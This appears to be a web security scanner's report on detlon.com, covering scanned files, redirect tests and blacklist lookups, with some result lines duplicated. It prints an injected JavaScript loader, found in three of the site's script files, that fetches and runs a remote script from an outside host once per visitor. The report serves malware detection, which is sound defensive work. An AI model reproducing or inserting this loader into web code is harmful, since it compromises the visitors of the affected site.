Scanned pages/files
| Request | Server response | Status |
http://www.detlon.com/ | 200 OK Content-Length: 7666 Content-Type: text/html | clean |
http://www.detlon.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72177 Content-Type: application/javascript | clean |
http://www.detlon.com/js/jquery-ui-1.8.2.custom.min.js | 200 OK Content-Length: 42581 Content-Type: application/javascript | clean |
http://www.detlon.com/js/jquery.mousewheel.min.js | 200 OK Content-Length: 1816 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var dont=false; var ds={} try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;} try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;} try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {} if(ds.local || ds.session) dont=true; if(!dont) { var ddpopka=document.createElement('script'); ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796" try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); } } Antivirus reports:
| ||
http://www.detlon.com/js/vertical.slider.js | 200 OK Content-Length: 4112 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var dont=false; var ds={} try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;} try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;} try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {} if(ds.local || ds.session) dont=true; if(!dont) { var ddpopka=document.createElement('script'); ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796" try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); } } Antivirus reports:
| ||
http://www.detlon.com/js/stuff.js | 200 OK Content-Length: 1081 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var dont=false; var ds={} try{ ds.session = sessionStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.session = false;} try{ ds.local = localStorage.ifr_1234 == "xui" ? true : false; }catch(e){ds.local = false;} try { localStorage.ifr_1234 = "xui"; sessionStorage.ifr_1234 = "xui"; } catch (e) {} if(ds.local || ds.session) dont=true; if(!dont) { var ddpopka=document.createElement('script'); ddpopka.src="http://m3.changeip.name/validate.js?ftpid=2796" try{ document.body.appendChild(ddpopka); }catch(e){ document.documentElement.appendChild(ddpopka); } } Antivirus reports:
| ||
http://www.detlon.com/menu.js | 200 OK Content-Length: 6039 Content-Type: application/javascript | clean |
http://www.detlon.com/index.php?pg=we_offer | 200 OK Content-Length: 10513 Content-Type: text/html | clean |
http://www.detlon.com/index.php?pg=career | 200 OK Content-Length: 6336 Content-Type: text/html | clean |
http://www.detlon.com/test404page.js | 404 Not Found Content-Length: 2779 Content-Type: text/html | clean |
http://www.detlon.com/javas.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.detlon.com/index.php?pg=about_android | 200 OK Content-Length: 8540 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: detlon.com
Result:
GET / HTTP/1.1
Host: detlon.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: detlon.com
Referer: http://www.google.com/search?q=detlon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: detlon.com
Referer: http://www.google.com/search?q=detlon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=detlon.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://detlon.com/
Result: detlon.com is not infected or malware details are not published yet.
Result: detlon.com is not infected or malware details are not published yet.